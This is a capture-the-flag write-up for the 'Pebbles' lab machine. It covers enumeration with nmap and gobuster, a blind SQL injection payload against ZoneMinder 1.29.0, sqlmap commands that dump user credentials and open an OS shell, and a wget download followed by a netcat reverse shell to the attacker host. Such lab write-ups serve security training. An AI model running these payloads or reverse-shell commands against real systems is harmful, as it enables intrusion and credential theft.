Pebbles
Writeup for Pebbles from Offensive Security Proving Grounds (PG)
Information Gathering
Service Enumeration
nmapAutomator.sh -H 192.168.85.52 -t full
nmapAutomator.sh -H 192.168.85.52 -t vulns
HTTP
Port 80
gobuster dir -u http://192.168.85.52 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50
Using a larger wordlist:
gobuster dir -u http://192.168.85.52 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -x .txt,.php --threads 100
We have a ZoneMinder console (v1.29.0).
Port 8080 contains another HTTP service.
gobuster dir -u http://192.168.85.52:8080 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50
There is a hello.php.
Exploitation
From the ZoneMinder version (v1.29.0) above, we find that it is vulnerable to SQL injection.
https://www.exploit-db.com/exploits/41239
It appears that the limit parameter is vulnerable to stacked queries. Using the following POST payload:
view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5
We can make the server sleep for 5 seconds.
This is a blind SQL injection (True = sleep, False = no sleep).
We can automate the blind SQL injection using sqlmap.
sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm --tables --threads 5
sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm -T Users -C Username,Password --dump --threads 5
We can achieve RCE using the --os-shell option.
sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell
wget "http://192.168.49.133/nc" -O /tmp/nc
chmod +x /tmp/nc
/tmp/nc -e /bin/bash 192.168.49.133 3305Two things were important here: the port 3305, and the location of the nc binary.
On our listening machine, we get a root shell.
Upgrade to an interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'
Proof:
Last updated
Was this helpful?